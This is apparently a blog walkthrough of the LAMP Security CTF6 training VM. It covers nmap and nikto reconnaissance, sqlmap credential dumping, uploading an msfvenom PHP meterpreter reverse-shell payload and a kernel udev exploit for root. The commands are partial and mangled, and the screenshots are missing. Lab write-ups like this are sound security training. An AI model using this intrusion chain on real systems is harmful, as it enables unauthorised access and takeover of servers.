April 28, 2019

LAMP Security CTF6 Walk through

Hello readers, today we are going to solve Lamp securityctf6. This is a beginner level challenge. In this walk through we are going to exploit the VM and gain the root privilege. Lets begin and get the root access.

List of actions
  •  Reconnaissance the target
  •  Web application enumeration
  •  Sql injection using sqlmap
  •  Web application exploitation using backdoor
  •  Get the restricted shell access of the target 
  •  Upload exploit
  •  Gain root privilege

1      Reconnaissance 

First of all we have to discover the target vm using netdiscover tool in Kali.

Finally we have got our Target VM after the search result.

Now we know our target VMs IP. So lets scan with nmap to discover the open ports and services running inside the target. For doing so please execute the below command and wait for the result.

Nmap –sT –O –p-

From the above screenshot we can observe a webserver is running on port 80. So lets open the website and enumerate for further information. 

2      Web application enumeration
 The above website is running on port 80. Now lets scan the website using nikto and find out if any vulnerability exists.

The scan results give us some fruiteful information. As per the result we can do directory indexing on below file paths, which may give us some sensitive information about the web application.

-          /files/
-          /sql/

Let’s enumerate those paths and find out if we get any information in it.

From the above screenshot we get to know this directory contains some image files. Later we will see how to upload a backdoor within it.

From the above scrrenshot we can observe a file exists with name db.sql. Lets open the file and see if we can get any login credentials.

From the above screenshot we can see somewhere in between the file the credentials for admin was written in plaintext.
Username = admin
Password = adminpass

3      Sql injection using sqlmap
We can try to get the credentilas with sqlmap also. So lets get the admin password using sqlmap as well.

Type the following sqlmap command in the console and hit enter

Sqlmap –o –p “” - - forms - - dbs

From the above command we have got the below databases.

Our target is cms, So lets enumerate the db and find out the tables inside. For the please execute the command below.

Sqlmap –o –p “” - - forms - - dbs cms –tables.

As a result we have got three results below.

Now get the data inside the user table. For doing that please execute the below command.

Sqlmap –o –p “” - - forms – D cms –T user – dumps

We have successfully got the admin credentials.

As we have got the adman credentials let’s try to login inside the application admin panel.

We have successfully logged inside the admin account.

4      Web application exploitation using backdoor
Now using the Add Event page we will try to upload the backdoor and get the shell of the server.
For doing that enter the below command in kali machine.

Msfvenom –p php/meterpreter/reverse_tcp lhost= lport=4444 –f raw
After getting the result copy the code from <?php to die(); and save it on the desktop with the name shell.php

Now lets move to the application and try to upload the shell.php file.

After that come back to kali machine and start the msfconsole and execute the below commands to get the meterpreter session.

Now come back to the web application and browse to the below directory to execute the uploaded file shell.php

We have successfully got the meterpreter session.

Now run the ‘sysinfo’ command to get the server kernel information. So that we can searh for any exploit for escalating root privilege.

 As per the above sceenshot the kernel version for the target system is 1.6.18-92. Lets search the expoit from the internet.

After multiple search I have got the below exploit in exploit-db.

Lets download the explot and upload it inside the /tmp directory of the target system.

5      Upload exploit
For doing that please follow the below steps.

6      Get the restricted shell access of the target
After successfully upload the file lets run the ‘shell’ command and type the below python script in the shell and execute it to get the restrictive access of the target bash command prompt.

Now go to the /tmp folder and give the perssion to the file using ‘chmod’ command

7      Gain root privilege
Now run the below command to get the netlink id and after that execute the udev.sh file with the id as argument.

Congratulation!! We have successfully got the root access. But one small thing keep in mind you might have to execute the shell script more than one time to get the root access as you can see I have tried more than one time to be assured of execution of the script successfully. If you have any further doubt on this please let me know in the comment section. Thanks for reading my article. Happy hacking!!


Post a Comment